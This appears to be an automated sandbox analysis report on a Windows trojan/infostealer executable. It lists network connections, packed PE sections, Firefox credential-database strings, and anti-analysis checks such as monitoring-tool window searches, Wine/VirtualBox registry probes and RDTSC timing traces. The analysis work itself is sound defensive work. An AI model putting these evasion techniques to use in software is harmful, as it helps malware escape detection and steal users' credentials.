              Source: file.exe, 00000001.00000003.1350763874.000000000562E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
              Source: file.exe, 00000001.00000003.1350763874.000000000562E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
              Source: file.exe, 00000001.00000003.1350763874.000000000562E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000001.00000003.1350763874.000000000562E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.7:49700 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.7:49701 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.7:49702 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.7:49703 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.7:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.7:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.7:49722 version: TLS 1.2

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .rsrc
              Source: file.exeStatic PE information: section name: .idata
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0048104F1_2_0048104F
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004960221_2_00496022
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0047E1A01_2_0047E1A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004804601_2_00480460
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004A15DC1_2_004A15DC
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0047F7551_2_0047F755
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0048D7F81_2_0048D7F8
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004AB7B01_2_004AB7B0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0049F9D01_2_0049F9D0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004979B01_2_004979B0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0049AB201_2_0049AB20
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0047EC201_2_0047EC20
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004ABCA91_2_004ABCA9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004B50401_2_004B5040
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004A50501_2_004A5050
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0048E07E1_2_0048E07E
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004750001_2_00475000
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004710001_2_00471000
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0048D0101_2_0048D010
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0049702F1_2_0049702F
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004AF0201_2_004AF020
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004930E01_2_004930E0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004B40E01_2_004B40E0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004AB0F01_2_004AB0F0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004770B01_2_004770B0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004B21651_2_004B2165
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004911001_2_00491100
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0049A1121_2_0049A112
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004791E91_2_004791E9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0047B2401_2_0047B240
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0047A2601_2_0047A260
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005D42661_2_005D4266
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004712D51_2_004712D5
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0053F2F41_2_0053F2F4
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0049D2FD1_2_0049D2FD
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0062029F1_2_0062029F
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006023551_2_00602355
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004993281_2_00499328
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004713281_2_00471328
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004B53301_2_004B5330
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005333DB1_2_005333DB
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0049B3D01_2_0049B3D0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004983E21_2_004983E2
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0063A3B61_2_0063A3B6
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0049C3A61_2_0049C3A6
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004784601_2_00478460
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004A44611_2_004A4461
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004814CE1_2_004814CE
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004B24E01_2_004B24E0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0049F5701_2_0049F570
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0063F55D1_2_0063F55D
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0049A5101_2_0049A510
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004925201_2_00492520
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004AA5231_2_004AA523
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004865D71_2_004865D7
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004B35F01_2_004B35F0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004B37401_2_004B3740
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004937701_2_00493770
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004B27001_2_004B2700
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0047A7201_2_0047A720
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0049F73A1_2_0049F73A
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004AC7A01_2_004AC7A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004AF8001_2_004AF800
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0048E8371_2_0048E837
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004998F21_2_004998F2
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004A08871_2_004A0887
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004A08B11_2_004A08B1
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004969401_2_00496940
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004739301_2_00473930
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004B39C01_2_004B39C0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0062A9CC1_2_0062A9CC
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004869971_2_00486997
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00484A4C1_2_00484A4C
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0048FA4F1_2_0048FA4F
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0047DA801_2_0047DA80
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004B3A901_2_004B3A90
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00477AB01_2_00477AB0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004E3B411_2_004E3B41
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004B2B101_2_004B2B10
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00559BDC1_2_00559BDC
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004A4BC71_2_004A4BC7
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0049CBD01_2_0049CBD0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0048FBA01_2_0048FBA0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00663C001_2_00663C00
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0048CC201_2_0048CC20
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00630C131_2_00630C13
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0049ECE01_2_0049ECE0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004B9CE01_2_004B9CE0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0048ED481_2_0048ED48
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0047BD501_2_0047BD50
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00476D101_2_00476D10
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0051AD2A1_2_0051AD2A
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00528D981_2_00528D98
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004B3D901_2_004B3D90
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0047ADB01_2_0047ADB0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00483E451_2_00483E45
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004A3E241_2_004A3E24
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00491EC51_2_00491EC5
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00478EF01_2_00478EF0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0063BEB21_2_0063BEB2
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004AAE901_2_004AAE90
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0047DF601_2_0047DF60
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004A9F611_2_004A9F61
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006A7F091_2_006A7F09
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004A0F3E1_2_004A0F3E
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00625F1B1_2_00625F1B
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00479FF51_2_00479FF5
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004B2FB01_2_004B2FB0
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 0047E190 appears 152 times
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 0047C890 appears 69 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: ZLIB complexity 0.9981081014890282
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@2/1
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004A2240 CoCreateInstance,1_2_004A2240
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000001.00000003.1314879408.000000000533B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000003.1335626324.0000000005337000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000003.1335495165.0000000005341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: file.exeReversingLabs: Detection: 42%
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: file.exeStatic file information: File size 2939904 > 1048576
              Source: file.exeStatic PE information: Raw size of fiufktgl is bigger than: 0x100000 < 0x2a2400

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 1.2.file.exe.470000.0.unpack :EW;.rsrc :W;.idata :W;fiufktgl:EW;thfjtvjw:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;fiufktgl:EW;thfjtvjw:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x2d6421 should be: 0x2dc1cb
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .rsrc
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name: fiufktgl
              Source: file.exeStatic PE information: section name: thfjtvjw
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0076E035 push ecx; mov dword ptr [esp], 4654D9BEh1_2_0076E150
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0076E035 push ecx; mov dword ptr [esp], 2E385851h1_2_0076E179
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0076E035 push ecx; mov dword ptr [esp], esi1_2_0076E18C
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006C60E5 push edi; mov dword ptr [esp], ebx1_2_006C613A
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006C60E5 push ecx; mov dword ptr [esp], 77BB4CFFh1_2_006C614E
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006C60E5 push 60AACA7Ah; mov dword ptr [esp], edi1_2_006C6184
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006550FF push 0446B500h; mov dword ptr [esp], ebx1_2_00655152
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006550FF push 1AE22D4Ah; mov dword ptr [esp], ebx1_2_006582CA
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006550FF push 7786B3D4h; mov dword ptr [esp], edi1_2_006582D7
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0072F17A push 52AFEF72h; mov dword ptr [esp], edx1_2_0072F214
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0072F17A push edi; mov dword ptr [esp], 1A3234B7h1_2_0072F29C
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0072F17A push 625E2BBCh; mov dword ptr [esp], ecx1_2_0072F2DC
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006C0118 push esi; mov dword ptr [esp], edx1_2_006C0152
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0055C1C4 push ebx; mov dword ptr [esp], edx1_2_0055C1CE
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0055C1C4 push ebp; mov dword ptr [esp], 7A7E5413h1_2_0055C232
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0055C1C4 push esi; mov dword ptr [esp], eax1_2_0055C2DD
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0055C1C4 push eax; mov dword ptr [esp], 7B335F66h1_2_0055C2E5
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006A119F push 3FAF9568h; mov dword ptr [esp], edx1_2_006A11F4
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006A119F push ecx; mov dword ptr [esp], ebx1_2_006A1231
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005D4266 push 215E1602h; mov dword ptr [esp], eax1_2_005D42D7
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005D4266 push ecx; mov dword ptr [esp], eax1_2_005D4370
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005D4266 push ebx; mov dword ptr [esp], ebp1_2_005D43D9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005D4266 push ebp; mov dword ptr [esp], ebx1_2_005D43FC
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0072B23A push 5408B400h; mov dword ptr [esp], ebp1_2_0072B24E
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004D32DC push eax; mov dword ptr [esp], edx1_2_004D5D08
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004D32DC push edx; mov dword ptr [esp], esi1_2_004D5D0C
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0053F2F4 push 26705F4Ah; mov dword ptr [esp], eax1_2_0053F315
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0053F2F4 push ebp; mov dword ptr [esp], 3433377Bh1_2_0053F407
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0053F2F4 push 04E0DF8Fh; mov dword ptr [esp], eax1_2_0053F418
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0053F2F4 push 5FF99E66h; mov dword ptr [esp], ebx1_2_0053F444
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0053F2F4 push 1112FA0Bh; mov dword ptr [esp], ecx1_2_0053F52D
              Source: file.exeStatic PE information: section name: entropy: 7.981472592877069

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0CB second address: 4CF0CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0CF second address: 4CF0D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0D3 second address: 4CF0DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0DC second address: 4CE9E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 jnp 00007FBBF0E1BFD4h 0x0000000f pushad 0x00000010 jmp 00007FBBF0E1BFC6h 0x00000015 mov eax, dword ptr [ebp+122D2ACFh] 0x0000001b popad 0x0000001c push dword ptr [ebp+122D0A05h] 0x00000022 mov dword ptr [ebp+122D2825h], edx 0x00000028 jmp 00007FBBF0E1BFC8h 0x0000002d call dword ptr [ebp+122D2892h] 0x00000033 pushad 0x00000034 mov dword ptr [ebp+122D285Fh], eax 0x0000003a xor eax, eax 0x0000003c sub dword ptr [ebp+122D285Fh], edx 0x00000042 mov edx, dword ptr [esp+28h] 0x00000046 stc 0x00000047 mov dword ptr [ebp+122D2DDFh], eax 0x0000004d jmp 00007FBBF0E1BFC2h 0x00000052 mov esi, 0000003Ch 0x00000057 sub dword ptr [ebp+122D3825h], eax 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 or dword ptr [ebp+122D3825h], ecx 0x00000067 lodsw 0x00000069 xor dword ptr [ebp+122D285Fh], edi 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 pushad 0x00000074 jg 00007FBBF0E1BFB9h 0x0000007a mov dx, ax 0x0000007d popad 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 jmp 00007FBBF0E1BFBDh 0x00000087 nop 0x00000088 push esi 0x00000089 push eax 0x0000008a push edx 0x0000008b jp 00007FBBF0E1BFB6h 0x00000091 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648D1D second address: 648D23 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648D23 second address: 648D3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBBF0E1BFC2h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648D3B second address: 648D4B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBBF0BBFDB2h 0x00000008 je 00007FBBF0BBFDA6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648D4B second address: 648D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007FBBF0E1BFB6h 0x00000010 jmp 00007FBBF0E1BFBFh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648D6A second address: 648D80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF0BBFDB2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648D80 second address: 648D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648D86 second address: 648D8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 649352 second address: 64939A instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBBF0E1BFD8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FBBF0E1BFC8h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64AF55 second address: 4CE9E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 xor dword ptr [esp], 798D2124h 0x0000000c mov edx, dword ptr [ebp+122D2B83h] 0x00000012 push dword ptr [ebp+122D0A05h] 0x00000018 mov dword ptr [ebp+122D285Fh], ebx 0x0000001e call dword ptr [ebp+122D2892h] 0x00000024 pushad 0x00000025 mov dword ptr [ebp+122D285Fh], eax 0x0000002b xor eax, eax 0x0000002d sub dword ptr [ebp+122D285Fh], edx 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 stc 0x00000038 mov dword ptr [ebp+122D2DDFh], eax 0x0000003e jmp 00007FBBF0BBFDB2h 0x00000043 mov esi, 0000003Ch 0x00000048 sub dword ptr [ebp+122D3825h], eax 0x0000004e add esi, dword ptr [esp+24h] 0x00000052 or dword ptr [ebp+122D3825h], ecx 0x00000058 lodsw 0x0000005a xor dword ptr [ebp+122D285Fh], edi 0x00000060 add eax, dword ptr [esp+24h] 0x00000064 pushad 0x00000065 jg 00007FBBF0BBFDA9h 0x0000006b mov dx, ax 0x0000006e popad 0x0000006f mov ebx, dword ptr [esp+24h] 0x00000073 jmp 00007FBBF0BBFDADh 0x00000078 nop 0x00000079 push esi 0x0000007a push eax 0x0000007b push edx 0x0000007c jp 00007FBBF0BBFDA6h 0x00000082 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64AF9C second address: 64AFA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FBBF10EAAF6h 0x0000000a rdtsc
